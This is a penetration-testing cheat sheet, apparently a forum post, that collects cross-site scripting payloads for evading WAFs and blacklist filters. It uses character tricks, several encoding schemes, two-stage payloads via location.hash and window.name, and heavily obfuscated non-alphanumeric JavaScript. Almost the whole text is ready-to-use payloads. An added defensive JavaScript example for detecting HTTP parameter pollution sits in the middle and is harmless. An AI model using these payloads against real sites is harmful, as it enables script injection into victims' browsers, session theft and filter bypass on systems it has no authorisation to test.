| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|

A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = ).

HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>

Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />

Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />

Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />

Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />

Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />

Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />

Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>

Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />

Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>

Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>

Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">

Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>

Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->

No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <

Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>

Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>

JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>

Encoding Galore.

HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>

URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>

JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>

JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>

JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>

Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
[quote] = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2[/quote]

<img src="1" onnerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

Useless and/or Useful features.

HTML 5 (Not comphrensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />

Usuage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />

CSS Comments (IE)
<div style="z:exp/[i]anything[/i]/res/[i]here[/i]/sion(alert(1))" />

Alternate ways of executing JavaScript functions
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>

Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[url=0]alt+lang[/url]>

HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>

HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>

XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>

URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2
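Because the frameworks in that table disagree about which copy of a repeated parameter wins, a filter that inspects one copy can be out of step with the application that consumes the other. The added example below (not part of the original post) shows, in JavaScript, how to surface repeated keys before resolution and how each of the three policies in the table reads the same URL; `parseQuery`, `duplicatedKeys` and `resolve` are names assumed for this example, and the sample URL is constructed from the one in the post.

```javascript
// Added example (not part of the original post): detecting HTTP parameter
// pollution at the boundary instead of hoping the filter and the backend agree.

// Group every value of every key; URLSearchParams keeps all copies in order.
function parseQuery(url) {
  const params = new URL(url).searchParams;
  const grouped = new Map();
  for (const key of new Set(params.keys())) {
    grouped.set(key, params.getAll(key));
  }
  return grouped;
}

// Defensive check: any key that appears more than once is reported so the
// request can be rejected (or the duplicates collapsed by one explicit rule).
function duplicatedKeys(url) {
  return [...parseQuery(url)]
    .filter(([, values]) => values.length > 1)
    .map(([key]) => key);
}

// Model the three behaviours listed above: 'join' mirrors ASP/ASP.NET,
// 'first' mirrors JSP's getParameter, 'last' mirrors PHP's $_GET.
function resolve(url, policy) {
  const out = {};
  for (const [key, values] of parseQuery(url)) {
    if (policy === 'first') out[key] = values[0];
    else if (policy === 'last') out[key] = values[values.length - 1];
    else if (policy === 'join') out[key] = values.join(',');
    else throw new Error('unknown policy: ' + policy);
  }
  return out;
}

// Constructed sample: the URL from the post plus one unrepeated key.
const SAMPLE_URL = 'http://target.com/something.xxx?a=val1&a=val2&b=x';
```

Running `resolve` with each policy on the sample URL gives `a = val1`, `a = val2` and `a = val1,val2` respectively, which is exactly the disagreement the table describes; `duplicatedKeys` returns `['a']`, the signal a front-end filter or WAF should act on rather than picking a copy itself.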

Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)

http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)

Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>

Non-alphanumeric craziness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>

<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>